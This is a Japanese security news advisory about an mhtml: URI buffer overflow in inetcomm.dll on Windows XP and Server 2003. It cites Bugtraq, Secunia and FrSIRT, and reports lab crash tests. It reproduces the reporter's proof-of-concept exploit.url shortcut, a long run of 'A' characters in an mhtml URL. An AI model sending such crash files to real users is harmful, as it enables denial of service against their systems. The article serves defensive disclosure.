Mr.Niega氏は、Windows XPとWindows Server 2003のinetcomm.dllにバウンダリ・エラーの脆弱性が存在し、細工した「mhtml:」URIハンドラによってサービス拒否を引き起こすことが可能であることを報告した。
・Bugtraq(Internet explorer Vulnerbility):
http://www.securityfocus.com/archive/1/435492/30/60/threaded
またSecuniaやFrSIRTのアドバイザリによれば、この脆弱性はリモートでコードが実行できる可能性が高いとしている。脆弱性の存在が明らかにされたことで、任意のコードが実行可能な実証コードが公開されることが懸念される。
・Secunia(Microsoft Windows "mhtml:" URI Buffer Overflow Vulnerability):
http://secunia.com/advisories/20384/
・FrSIRT(Microsoft Windows "mhtml:" URI Handling Remote Buffer Overflow
Vulnerability):
http://www.frsirt.com/english/advisories/2006/2088
なおMr.Niega氏の報告によれば、以下のようなURLショートカット(exploit.url)を用意(Aの数は2060個。「mhtml:」URIハンドラ部分の改行は取ること)し、これをクリックすることで脆弱性の有無が検証できるとしている。DA
Labで試したところ、Windows XP SP2では、Internet Explorer(IE)が起動後、IEがエラー・ダイログを表示して異常終了した。このエラー・ダイアログによれば、inetcomm.dllでエラーが発生していた。またWindows
XP SP1a+IE 6 SP1では、「無効な構文エラー」となり、ページが表示できないだけであった。FrSIRTのアドバイザリでは、Windows XP SP1も脆弱性の対象となっていたが、Mr.Niega氏の実証コードでは脆弱性が確認できなかった(Windows
2000は脆弱性の対象となっていない)。
[DEFAULT]
BASEURL=
[InternetShortcut]
URL=mhtml://mid:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
:(中略)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
現時点では、マイクロソフトからこの脆弱性に対する正式な報告や修正プログラムの提供は行われていない。容易に悪用できる脆弱性のため、いたずら目的の攻撃などに利用される危険性がある。またリモートでコードが実行できる可能性もあることから、今後、悪用されることも懸念される。電子メールに添付されている怪しいURLショートカットなどは絶対にクリックしないようにした方がよい。
|